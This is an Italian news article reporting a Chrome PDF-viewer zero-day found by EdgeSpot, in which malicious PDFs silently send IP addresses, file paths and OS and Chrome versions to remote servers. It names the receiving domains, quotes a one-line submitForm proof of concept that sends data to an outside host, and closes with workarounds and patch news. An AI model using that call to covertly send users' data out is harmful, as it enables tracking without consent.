Il servizio di rilevamento degli exploit EdgeSpot ha scoperto un'intrigante vulnerabilità zero-day di Chrome che sfrutta i documenti PDF. La vulnerabilità consente agli aggressori di raccogliere dati sensibili utilizzando documenti PDF dannosi aperti in Chrome.

Non appena la vittima apre i rispettivi file PDF in Google Chrome, un programma dannoso inizia a funzionare in background raccogliendo i dati dell'utente.

I dati vengono quindi inoltrati al server remoto che viene controllato dagli hacker. Potresti chiederti quali dati vengono aspirati dagli aggressori, che prendono di mira i seguenti dati sul tuo PC:

• indirizzo IP
• Percorso completo del file PDF sul sistema
• Versioni OS e Chrome

Attenzione ai file PDF gravati da malware

Potresti essere sorpreso di sapere che non accade nulla quando Adobe Reader viene utilizzato per l'apertura di file PDF. Inoltre, le richieste HTTP POST vengono utilizzate per trasferire dati ai server remoti senza alcun intervento dell'utente.

Gli esperti hanno scoperto che uno dei due domini readnotifycom o burpcollaboratornet stava ricevendo i dati.

Puoi immaginare l'intensità dell'attacco considerando il fatto che la maggior parte del software antivirus non è in grado di rilevare i campioni rilevati da EdgeSpot.

Gli esperti rivelano che gli aggressori stanno usando l'API Javascript PDF "this.submitForm ()" per raccogliere le informazioni sensibili degli utenti.

Lo abbiamo testato con un PoC minimo, una semplice chiamata API come "this.submitForm (" http://google.com/test ")" farà sì che Google Chrome invii i dati personali a google.com.

Gli esperti hanno effettivamente scoperto che questo bug di Chrome veniva sfruttato da due distinti set di file PDF dannosi. Entrambi sono stati distribuiti rispettivamente nell'ottobre 2017 e nel settembre 2018.

In particolare, i dati raccolti possono essere utilizzati dagli aggressori per ottimizzare gli attacchi in futuro. I rapporti suggeriscono che il primo lotto di file è stato compilato utilizzando il servizio di tracciamento PDF di ReadNotify.

Gli utenti possono utilizzare il servizio per tenere traccia delle visualizzazioni degli utenti. EdgeSpot non ha condiviso dettagli sulla natura della seconda serie di file PDF.

Come rimanere protetti

Il servizio di rilevamento degli exploit EdgeSpot voleva avvisare gli utenti di Chrome in merito ai potenziali rischi poiché non si prevede che la patch verrà rilasciata nel prossimo futuro.

EdgeSpot ha riferito a Google della vulnerabilità l'anno scorso e la società ha promesso di rilasciare una patch alla fine di aprile. H

tuttavia, è possibile prendere in considerazione l'utilizzo di una soluzione temporanea al problema visualizzando localmente i documenti PDF ricevuti utilizzando un'app di lettura PDF alternativa.

In alternativa, puoi anche aprire i tuoi documenti PDF in Chrome disconnettendo i tuoi sistemi da Internet. Nel frattempo, puoi attendere l'aggiornamento di Chrome 74 che dovrebbe essere lanciato il 23 aprile.